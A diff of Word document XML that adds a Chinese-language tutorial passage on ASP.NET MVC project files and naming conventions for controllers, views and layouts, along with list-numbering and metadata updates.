+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="NSimSun" w:hint="eastAsia"/>
+                <w:color w:val="000000"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="22"/>
+                <w:szCs w:val="22"/>
+              </w:rPr>
+              <w:t>/Views/Shared</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4886" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="10"/>
+              <w:spacing w:line="300" w:lineRule="exact"/>
+              <w:rPr>
+                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="NSimSun"/>
+                <w:color w:val="000000"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="22"/>
+                <w:szCs w:val="22"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="NSimSun" w:hint="eastAsia"/>
+                <w:color w:val="000000"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="22"/>
+                <w:szCs w:val="22"/>
+              </w:rPr>
+              <w:t>本目录保存布局，以及不专用于个别控制器的视图</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="3561" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="10"/>
+              <w:spacing w:line="300" w:lineRule="exact"/>
+              <w:rPr>
+                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="NSimSun"/>
+                <w:color w:val="000000"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="22"/>
+                <w:szCs w:val="22"/>
+              </w:rPr>
+            </w:pPr>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="2235" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="10"/>
+              <w:spacing w:line="300" w:lineRule="exact"/>
+              <w:rPr>
+                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="NSimSun" w:hint="eastAsia"/>
+                <w:color w:val="000000"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="22"/>
+                <w:szCs w:val="22"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="NSimSun" w:hint="eastAsia"/>
+                <w:color w:val="000000"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="22"/>
+                <w:szCs w:val="22"/>
+              </w:rPr>
+              <w:t>/Views/Web.config</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4886" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="10"/>
+              <w:spacing w:line="300" w:lineRule="exact"/>
+              <w:rPr>
+                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="NSimSun"/>
+                <w:color w:val="000000"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="22"/>
+                <w:szCs w:val="22"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="NSimSun" w:hint="eastAsia"/>
+                <w:color w:val="000000"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="22"/>
+                <w:szCs w:val="22"/>
+              </w:rPr>
+              <w:t>这不是应用程序的配置文件。它包含使视图能够与ASP.NET进行工作，防止IIS调用视图所需要的配置，还含有默认导入视图的命名空间</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="3561" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="10"/>
+              <w:spacing w:line="300" w:lineRule="exact"/>
+              <w:rPr>
+                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="NSimSun"/>
+                <w:color w:val="000000"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="22"/>
+                <w:szCs w:val="22"/>
+              </w:rPr>
+            </w:pPr>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="2235" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="10"/>
+              <w:spacing w:line="300" w:lineRule="exact"/>
+              <w:rPr>
+                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="NSimSun" w:hint="eastAsia"/>
+                <w:color w:val="000000"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="22"/>
+                <w:szCs w:val="22"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="NSimSun" w:hint="eastAsia"/>
+                <w:color w:val="000000"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="22"/>
+                <w:szCs w:val="22"/>
+              </w:rPr>
+              <w:t>/Global.asax</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4886" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="10"/>
+              <w:spacing w:line="300" w:lineRule="exact"/>
+              <w:rPr>
+                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="NSimSun"/>
+                <w:color w:val="000000"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="22"/>
+                <w:szCs w:val="22"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="NSimSun" w:hint="eastAsia"/>
+                <w:color w:val="000000"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="22"/>
+                <w:szCs w:val="22"/>
+              </w:rPr>
+              <w:t>这是全局ASP.NET应用程序类。它的后台代码类用于注册路由配置，也是建立涉及应用程序初始化，停机及出现未处理异常情况需要运行代码的地方</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="3561" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="10"/>
+              <w:spacing w:line="300" w:lineRule="exact"/>
+              <w:rPr>
+                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="NSimSun"/>
+                <w:color w:val="000000"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="22"/>
+                <w:szCs w:val="22"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="NSimSun" w:hint="eastAsia"/>
+                <w:color w:val="000000"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="22"/>
+                <w:szCs w:val="22"/>
+              </w:rPr>
+              <w:t>Global.asax文件在MVC应用程序中的作用与其在WebForm应用程序中作用相同</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="2235" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="10"/>
+              <w:spacing w:line="300" w:lineRule="exact"/>
+              <w:rPr>
+                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="NSimSun" w:hint="eastAsia"/>
+                <w:color w:val="000000"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="22"/>
+                <w:szCs w:val="22"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="NSimSun" w:hint="eastAsia"/>
+                <w:color w:val="000000"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="22"/>
+                <w:szCs w:val="22"/>
+              </w:rPr>
+              <w:t>/Web.config</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4886" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="10"/>
+              <w:spacing w:line="300" w:lineRule="exact"/>
+              <w:rPr>
+                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="NSimSun"/>
+                <w:color w:val="000000"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="22"/>
+                <w:szCs w:val="22"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="NSimSun" w:hint="eastAsia"/>
+                <w:color w:val="000000"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="22"/>
+                <w:szCs w:val="22"/>
+              </w:rPr>
+              <w:t>这是应用程序配置文件</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="3561" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="10"/>
+              <w:spacing w:line="300" w:lineRule="exact"/>
+              <w:rPr>
+                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="NSimSun"/>
+                <w:color w:val="000000"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="22"/>
+                <w:szCs w:val="22"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="NSimSun" w:hint="eastAsia"/>
+                <w:color w:val="000000"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="22"/>
+                <w:szCs w:val="22"/>
+              </w:rPr>
+              <w:t>与WebForm作用相同</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+    </w:tbl>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="10"/>
+        <w:spacing w:line="300" w:lineRule="exact"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="NSimSun" w:hint="eastAsia"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="10"/>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
+          <w:b/>
+          <w:color w:val="0070C0"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
+          <w:b/>
+          <w:color w:val="0070C0"/>
+        </w:rPr>
+        <w:t>约定优于配置</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="10"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
+          <w:b/>
+          <w:color w:val="0070C0"/>
+        </w:rPr>
+        <w:t>约定优于配置</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
+          <w:color w:val="0070C0"/>
+        </w:rPr>
+        <w:t>的含义为：</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>你不需要明确地配置控制器与其视图之间的关联，只要遵循某种命名约定，一切都会正常工作。</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="10"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="180"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
+          <w:b/>
+          <w:color w:val="0070C0"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
+          <w:b/>
+        </w:rPr>
+        <w:t>遵循控制器约定</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="10"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>控制器类名必须以“Controller”结尾，如HomeController</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="10"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="10"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="180"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
+          <w:b/>
+          <w:color w:val="0070C0"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
+          <w:b/>
+        </w:rPr>
+        <w:t>遵循视图约定</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="10"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>视图及分部视图放在/Views/ControllerName文件夹中。例如，一个与ProductController相关联的</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>视图应该放在/Views/Product文件夹中。</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="10"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>MVC框架期望，一个动作方法的默认视图应当按照这个方法进行命名。例如：名为List动作方法相关联的视图应该是</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> “List.cshtml”</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>。</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="10"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
+          <w:b/>
+          <w:color w:val="0070C0"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="10"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="180"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
+          <w:b/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
+          <w:b/>
+        </w:rPr>
+        <w:t>遵循布局约定</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="10"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>对于布局的约定是，以下划线(_)字符作为文件名前缀，而且</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>布局文件应该放在/Views/Shared文件夹中。默认情况下，会通过/Views/_ViewStart.cshtml文件将这个布局应用与所有的视图。如果不想把默认布局用于视图，可以修改_ViewStart.cshtml中的设置，或者将Layout设置为null</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="10"/>
         <w:spacing w:line="300" w:lineRule="exact"/>
         <w:rPr>
           <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="NSimSun"/>
@@ -16912,6 +18375,7 @@
           <w:szCs w:val="20"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>WebApi</w:t>
       </w:r>
     </w:p>
@@ -16958,7 +18422,6 @@
           <w:szCs w:val="20"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>数据库服务端、客户端、图形界面管理工具、数据库语言（</w:t>
       </w:r>
       <w:r>
@@ -64465,6 +65928,97 @@
     </w:lvl>
   </w:abstractNum>
   <w:abstractNum w:abstractNumId="58">
+    <w:nsid w:val="6A434F99"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="E6B0B326"/>
+    <w:lvl w:ilvl="0" w:tplc="9072C910">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%1."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="360" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:hint="default"/>
+        <w:b w:val="0"/>
+        <w:color w:val="auto"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="04090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%2)"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="840" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="0409001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%3."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="1260" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="0409000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%4."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1680" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="04090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%5)"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2100" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="0409001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%6."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="2520" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="0409000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%7."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2940" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="04090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%8)"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3360" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="0409001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%9."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="3780" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="59">
     <w:nsid w:val="6C7508CD"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="980A5440"/>
@@ -64613,7 +66167,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="59">
+  <w:abstractNum w:abstractNumId="60">
     <w:nsid w:val="6DEB2301"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="348AF822"/>
@@ -64758,7 +66312,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="60">
+  <w:abstractNum w:abstractNumId="61">
     <w:nsid w:val="7A1CE74A"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="7A1CE74A"/>
@@ -64907,7 +66461,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="61">
+  <w:abstractNum w:abstractNumId="62">
     <w:nsid w:val="7BAD69E7"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="F4727B6E"/>
@@ -64997,7 +66551,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="62">
+  <w:abstractNum w:abstractNumId="63">
     <w:nsid w:val="7E1D9B84"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="7E1D9B84"/>
@@ -65146,7 +66700,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="63">
+  <w:abstractNum w:abstractNumId="64">
     <w:nsid w:val="7FFE1E02"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="7FFE1E02"/>
@@ -65320,7 +66874,7 @@
     <w:abstractNumId w:val="28"/>
   </w:num>
   <w:num w:numId="9">
-    <w:abstractNumId w:val="62"/>
+    <w:abstractNumId w:val="63"/>
   </w:num>
   <w:num w:numId="10">
     <w:abstractNumId w:val="6"/>
@@ -66193,7 +67747,7 @@
     <w:abstractNumId w:val="40"/>
   </w:num>
   <w:num w:numId="48">
-    <w:abstractNumId w:val="63"/>
+    <w:abstractNumId w:val="64"/>
   </w:num>
   <w:num w:numId="49">
     <w:abstractNumId w:val="3"/>
@@ -68875,7 +70429,7 @@
     </w:lvlOverride>
   </w:num>
   <w:num w:numId="159">
-    <w:abstractNumId w:val="60"/>
+    <w:abstractNumId w:val="61"/>
   </w:num>
   <w:num w:numId="160">
     <w:abstractNumId w:val="37"/>
@@ -68884,7 +70438,7 @@
     <w:abstractNumId w:val="55"/>
   </w:num>
   <w:num w:numId="162">
-    <w:abstractNumId w:val="61"/>
+    <w:abstractNumId w:val="62"/>
   </w:num>
   <w:num w:numId="163">
     <w:abstractNumId w:val="52"/>
@@ -68911,10 +70465,10 @@
     <w:abstractNumId w:val="26"/>
   </w:num>
   <w:num w:numId="171">
-    <w:abstractNumId w:val="59"/>
+    <w:abstractNumId w:val="60"/>
   </w:num>
   <w:num w:numId="172">
-    <w:abstractNumId w:val="58"/>
+    <w:abstractNumId w:val="59"/>
   </w:num>
   <w:num w:numId="173">
     <w:abstractNumId w:val="53"/>
@@ -68936,6 +70490,9 @@
   </w:num>
   <w:num w:numId="179">
     <w:abstractNumId w:val="25"/>
+  </w:num>
+  <w:num w:numId="180">
+    <w:abstractNumId w:val="58"/>
   </w:num>
   <w:numIdMacAtCleanup w:val="172"/>
 </w:numbering>
@@ -69838,7 +71395,7 @@
 </file>
 
 <file path=customXml/itemProps2.xml><?xml version="1.0" encoding="utf-8"?>
-<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{45349E71-CAD9-4E9E-9F3D-4263FB0CAFC4}">
+<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{D30A7673-8894-45BF-83C2-8B026AF9104B}">
   <ds:schemaRefs>
     <ds:schemaRef ds:uri="http://schemas.openxmlformats.org/officeDocument/2006/bibliography"/>
   </ds:schemaRefs>
